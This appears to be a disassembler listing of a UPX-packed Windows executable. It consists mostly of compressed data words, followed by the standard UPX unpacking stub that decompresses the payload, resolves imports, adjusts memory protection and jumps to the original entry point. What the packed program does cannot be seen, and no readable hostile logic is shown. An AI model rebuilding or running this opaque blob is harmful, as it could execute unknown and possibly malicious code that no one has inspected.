dd 65C83367h, 6B7B81BFh, 0B87FDD28h, 43243359h, 4760D4E0h
dd 0DD93908h, 0DD787B70h, 1BF2E5D4h, 56033358h, 59435B42h
dd 0D0CB972Eh, 54999858h, 37B01C9Eh, 0A69A69A6h, 0C3A8855Dh
dd 1B90AFDEh, 0B121FE9Bh, 0C8B144C7h, 0C8ED441Fh, 0DE2C7B67h
dd 7B01440h, 4CC5CC03h, 13D755h, 7DD36372h, 3C1F031Bh
dd 9CD3E280h, 3BB2DE2h, 1328C35Bh, 0D9FE2073h, 0F8366C9h
dd 870F07D4h, 76E2F26h, 801FB0E4h, 2E1B412Ah, 0A036C241h
dd 53563BCDh, 0D90E4741h, 48A7BC85h, 4A481FD8h, 0CBD85793h
dd 474A543Bh, 42E44E28h, 761F611Eh, 5EC8D04Fh, 55388724h
dd 0E5F57C1h, 3CBD85C8h, 418C1F5Eh, 0C8BC9D69h, 5F69CBBAh
dd 0C1386C76h, 7D70403h, 1F0F0342h, 8207706Dh, 0D903A36Bh
dd 48DF0FFFh, 7B34378h, 0FCEC03EBh, 0DF8CEE99h, 0FC0B0217h
dd 40E00C13h, 652C0E48h, 40B49F17h, 37727A68h, 0C76EA76Fh
dd 8577876Eh, 711EBDD0h, 0B7CF7167h, 3ACF271Fh, 6AE9BB48h
dd 0C8E0BC53h, 8CBC85CDh, 0F3808BE0h, 2EC2770Ch, 5776B0AFh
dd 77977793h, 0B0917B1Fh, 77E7E3B9h, 1F79C9BFh, 22F245ECh
dd 7FAF7CFDh, 4872155Fh, 83F1CC2Eh, 0FE48BC64h, 408465h
dd 92658481h, 0C2BCBB3Fh, 0FF93CA5Eh, 95ED95D9h, 921C85BFh
dd 97D3C00Bh, 783725ACh, 0E00398C9h, 200E2798h, 180E8F67h
dd 18267C1Bh, 4B091D4h, 0E057D3A3h, 4B6AFC85h, 4DE2648Bh
dd 0B3900713h, 3BE2A341h, 91A71B8h, 3719E4BCh, 12A3E2D8h
dd 0E407210Fh, 52E2F4E4h, 0E921E310h, 13F5A48h, 7A42F613h
dd 194F3960h, 8718DD7Fh, 6F7BE4B6h, 5C6BCB03h, 0CEEC9D13h
dd 8BE36C4Eh, 0E33C3304h, 29B0197Ch, 0A08B279Bh, 7D6C8B7h
dd 44290816h, 7C07401Bh, 45392EEh, 1357F4E4h, 20F25714h
dd 1ACA57CCh, 3939205Ch, 6CE44C20h, 5F7300F2h, 5FE3F900h
dd 320C17FBh, 2017348h, 843803BCh, 0CCA4D20Ch, 1760B119h
dd 43B4BC9h, 902B3CE5h, 303211A2h, 80B80972h, 0FFAB4088h
dd 7A5045CFh, 413F2E2Fh, 74756F56h, 0FC859D5Fh, 5F666FFFh
dd 676E6172h, 74734065h, 8404064h, 3ECB216h, 8B9D303Fh
dd 0F55FC6E8h, 0EC150238h, 0B1F4081Bh, 0FF44BF19h, 0CAC0DF00h
dd 0FB16173Ch, 4D340407h, 51834D3h, 0C809060Dh, 7D34D20h
dd 0BD09080Ch, 0A360C80h, 1B570B1Bh, 3BEFB06Ch, 10570F07h
dd 36031113h, 12A417C8h, 0F352117h, 0C8320D8h, 33504341h
dd 360D8360h, 7531752h, 0DD35F57h, 7B59D836h, 0AB6D176Ch
dd 3482F720h, 721C704Dh, 0D832FC7h, 0B380D836h, 1F820781h
dd 0D8374D83h, 91478420h, 0B09E290Fh, 0A120D020h, 6C16F07h
dd 0B7A7641Bh, 2C1FCE9Fh, 0D7841CE1h, 3307180Bh, 150C1236h
dd 3700BF8Dh, 430621F6h, 9C2B40C7h, 0E9B2CD07h, 770933Eh
dd 10C6D80Ah, 0D34D34ACh, 127C1134h, 96691358h, 182CD34Dh
dd 0CC19C5F4h, 0A69A69A6h, 5C1B941Ah, 69A6CB1Ch, 141E349Ah
dd 20C4B01Fh, 34D7659Bh, 80472178h, 0C2E022C3h, 2CEE9A6Bh
dd 0BC790778h, 0D34C7F7Ah, 0FC07DD34h, 0BA98FFA8h, 0D42AB9EFh
dd 0B1D00EFh, 9019A404h, 88D9641h, 19019019h, 1908F8Eh
dd 91019019h, 11F78492h, 7AF9390h, 0B0A1C7BBh, 80D311F7h
dd 152C0008h, 3B10A401h, 180C5F1Fh, 17C8690h, 841B0853h
dd 601F17ADh, 2FD851C0h, 8C85DB01h, 0D3CC157Dh, 81439B40h
dd 0C42AA19h, 60088A0Fh, 0B1AB0107h, 83E64C40h, 0D6C7D12Fh
dd 2DB99CFh, 2007D7BBh, 142F3FFBh, 77A8866h, 323200B0h
dd 105C85h, 0C9004820h, 59800014h, 1F640B0Ah, 90A59005h
dd 0AC65FF04h, 0A038CAAh, 559002D7h, 0AB7C9E2Bh, 40201FEh
dd 5B03A408h, 21827982h, 0E7E4DFA6h, 0A107CF27h, 0E09F81A5h
dd 807E40FCh, 6EF0847Bh, 0A3C12FA8h, 81CCA3DAh, 0C08607FEh
dd 0B5403906h, 0FF90412Fh, 5FB641BBh, 0A2E4A2CFh, 0A2E5001Ah
dd 6F5BA2E8h, 7EAF9F77h, 551FEA1h, 0DA5EDA03h, 6ADA5F5Fh
dd 0C95FDB93h, 0D8D332DAh, 39F9E0DEh, 54597E31h, 0A845EC02h
dd 0C1FF0340h, 7B0810E0h, 0E9A657CAh, 0D9F8C54Ah, 0ECF003ABh
dd 9A69A69Ah, 0D8E0E4E8h, 0BA69C8D0h, 0B0BC69A6h, 989C2FA8h
dd 0A69A69A6h, 888C9094h, 69A69A84h, 787C809Ah, 416C7074h
dd 6469A69Ah, 9A485058h, 40BA69A6h, 24303803h, 0CCE9101Ch
dd 469AEh, 3D8FC97h, 0C1960FDCh, 409D0A6h, 0CA9B3353h
dd 72EBA6Eh, 4107F0DCh, 0C007F03h, 83041F52h, 0D12EA7FEh
dd 0A31803B3h, 0F0137080h, 1A3283F1h, 0ED508323h, 945E199Eh
dd 40443F6Ch, 0D94C53FCh, 2303C8B2h, 34D31E0Bh, 33BD74Dh
dd 0B597785Ah, 4D3659A6h, 111F3D4h, 4D344E30h, 16DD977h
dd 59033A33h, 36599677h, 0D3B4D34Dh, 2F0110F2h, 0A6C024C9h
dd 1F016C4Dh, 23FEA0C8h, 656CDBA1h, 6874676Eh, 21B09F5Fh
dd 1FDACDF4h, 6369676Fh, 616C2519h, 53171F1Eh, 371A3230h
dd 6805A83h, 37431BB0h, 74584446h, 4040AFA1h, 5B080090h
dd 10500D40h, 0FFC8A8C9h, 0B060CF2Fh, 74654701h, 48647453h
dd 6C646E61h, 52823A65h, 395E54C5h, 96D8A04Eh, 1141F028h
dd 41276443h, 65745DDCh, 0DD2141D3h, 50DB64BDh, 2E1D6814h
dd 6972570Ch, 0EFB6CDCFh
dd 1652470Bh, 82F0964h, 8A05DC22h, 7845E853h, 0F642D930h
dd 6D655296h, 0FB530C1Bh, 5A340182h, 0EC26450Fh, 4F767150h
dd 0A7544666h, 3DAD6489h, 75433CB6h, 122D7F72h, 0F6382905h
dd 59686E55h, 0F8354564h, 3CCC3615h, 73491C4Ch, 5AD76544h
dd 6717AADBh, 5047490Bh, 33EEB5F6h, 6D6D6F5Ch, 0DB754C30h
dd 3B6ED048h, 1D15856Bh, 732956B4h, 5007B3Fh, 0E118486Bh
dd 6F083119h, 5A148AD8h, 0B105CE61h, 0F070F615h, 64BB6E2Bh
dd 696152EDh, 740F7E5Eh, 6977956Ch, 563F0836h, 646F4D2Bh
dd 411B6C75h, 0B1A0244Dh, 6464414Fh, 5554DC72h, 0B7B37C81h
dd 5316740Ch, 0B38775ADh, 1F4349A4h, 110AEE6Bh, 63B64622h
dd 68536DD5h, 150E1038h, 5B5440B3h, 42A2FB36h, 45218649h
dd 3C96D6Bh, 0C09E6544h, 9A0240F8h, 7CCCB930h, 0C8596301h
dd 3459343h, 0E25464C5h, 56C21653h, 174C8C16h, 0E045B02Fh
dd 4D615738h, 2ABB6B43h, 5472C6BEh, 422F4D6Fh, 62449F79h
dd 57086C42h, 4F344CEDh, 6DC7A1C6h, 44707954h, 4578A842h
dd 2B6CF7AAh, 1AD4D9B4h, 0C794C00h, 0C7BE2831h, 0BE5664E0h
dd 9C2F688h, 726B515Dh, 7A035079h, 0C58F0ACCh, 0AC49605Eh
dd 1C76D98Ch, 0A1706B4Fh, 20E50AD0h, 4B795361h, 39ADB228h
dd 91731BD6h, 684C6D69h, 4BE39076h, 5845BBD9h, 54505915h
dd 0D8DAC7BCh, 70B410Ah, 94D454Fh, 68E0B410h, 43280DCEh
dd 0DB2C60BDh, 0BB6761A7h, 2AB4D530h, 0C9E2B06h, 18551A4Ch
dd 8EF55526h, 2118CD01h, 0E1301810h, 0CA9C38CDh, 2142690Fh
dd 0F4EEE09h, 6BA49A8Fh, 241B21BBh, 4D436D57h, 0A293117Bh
dd 0D413B09h, 0CB2D4857h, 0B1C60Dh, 29E06E74h, 976ECB59h
dd 6E474F14h, 3C660E41h, 20B23DABh, 0E5EB7255h, 5FB54550h
dd 0FDA0A8h, 4960BEA8h, 9FED9D09h, 3006D04h, 8010B01h
dd 4E00B020h, 439A108Eh, 4460C041h, 105FB3B3h, 8F45510Fh
dd 0A107B37Dh, 7E261701h, 1B037B01h, 100C413Bh, 22000607h
dd 5C2F144Eh, 23C065E5h, 6E36F7B2h, 0BDAF000h, 0F51612FAh
dd 83F234A7h, 2E0AFE5Dh, 74786574h, 0B090A1E5h, 642F0768h
dd 2E04CA98h, 9B906172h, 28FB3609h, 0EE03302Ch, 20D9735h
dd 8C262E40h, 0CEC1B29Bh, 0F04B1A28h, 0EC4FC027h, 737B05ECh
dd 0F36E6372h, 4F0173h, 1BA5F9FCh, 14E6E6CCh, 1, 0
dd 0FF1200h, 3 dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
var_AC = byte ptr -0ACh
ms_exc = CPPEH_RECORD ptr -18h
; FUNCTION CHUNK AT 00403F63 SIZE 0000018D BYTES
; FUNCTION CHUNK AT 0040411E SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00404138 SIZE 00000015 BYTES
pusha
mov esi, offset off_40D000
lea edi, [esi-0C000h]
push edi
jmp short loc_41394A
; ---------------------------------------------------------------------------
align 10h
loc_413940: ; CODE XREF: start:loc_413951�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_413946: ; CODE XREF: start+AE�j start+C5�j
add ebx, ebx
jnz short loc_413951
loc_41394A: ; CODE XREF: start+D�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_413951: ; CODE XREF: start+18�j
jb short loc_413940
mov eax, 1
loc_413958: ; CODE XREF: start+37�j start+42�j
add ebx, ebx
jnz short loc_413963
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_413963: ; CODE XREF: start+2A�j
adc eax, eax
add ebx, ebx
jnb short loc_413958
jnz short loc_413974
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_413958
loc_413974: ; CODE XREF: start+39�j
xor ecx, ecx
sub eax, 3
jb short loc_413988
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_4139FA
mov ebp, eax
loc_413988: ; CODE XREF: start+49�j
add ebx, ebx
jnz short loc_413993
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_413993: ; CODE XREF: start+5A�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4139A0
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4139A0: ; CODE XREF: start+67�j
adc ecx, ecx
jnz short loc_4139C4
inc ecx
loc_4139A5: ; CODE XREF: start+84�j start+8F�j
add ebx, ebx
jnz short loc_4139B0
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4139B0: ; CODE XREF: start+77�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4139A5
jnz short loc_4139C1
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4139A5
loc_4139C1: ; CODE XREF: start+86�j
add ecx, 2
loc_4139C4: ; CODE XREF: start+72�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_4139E4
loc_4139D5: ; CODE XREF: start+AC�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_4139D5
jmp loc_413946
; ---------------------------------------------------------------------------
align 4
loc_4139E4: ; CODE XREF: start+A3�j start+C1�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_4139E4
add edi, ecx
jmp loc_413946
; ---------------------------------------------------------------------------
loc_4139FA: ; CODE XREF: start+54�j
pop esi
mov edi, esi
mov ecx, 3ECh
loc_413A02: ; CODE XREF: start+D9�j start+DE�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_413A07: ; CODE XREF: start+FC�j
cmp al, 1
ja short loc_413A02
cmp byte ptr [edi], 5
jnz short loc_413A02
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov al, bl
loop loc_413A07
lea edi, [esi+11000h]
loc_413A34: ; CODE XREF: start+126�j
mov eax, [edi]
or eax, eax
jz short loc_413A76
mov ebx, [edi+4]
lea eax, [eax+esi+130B4h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+130F0h]
xchg eax, ebp
loc_413A51: ; CODE XREF: start+13E�j
mov al, [edi]
inc edi
or al, al
jz short loc_413A34
mov ecx, edi
push edi
dec eax
repne scasb
push ebp
call dword ptr [esi+130F4h]
or eax, eax
jz short loc_413A70
mov [ebx], eax
add ebx, 4
jmp short loc_413A51
; ---------------------------------------------------------------------------
loc_413A70: ; CODE XREF: start+137�j
call dword ptr [esi+13104h]
loc_413A76: ; CODE XREF: start+108�j
mov ebp, [esi+130F8h]
lea edi, [esi-1000h]
mov ebx, 1000h
push eax
push esp
push 4
push ebx
push edi
call ebp
lea eax, [edi+207h]
and byte ptr [eax], 7Fh
and byte ptr [eax+28h], 7Fh
pop eax
push eax
push esp
push eax
push ebx
push edi
call ebp
pop eax
popa
lea eax, [esp+2Ch+var_AC]
loc_413AAA: ; CODE XREF: start+17E�j
push 0
cmp esp, eax
jnz short loc_413AAA
sub esp, 0FFFFFF80h
jmp loc_404143
start endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 48h, 0Eh dup(0)
dd offset dword_40F060
dd offset dword_40DDA0
dd 0Fh, 140h dup(0)
UPX1 ends
; Section 4. (virtual address 00015000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00015000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 415000h
align 2000h
_idata2 ends
end start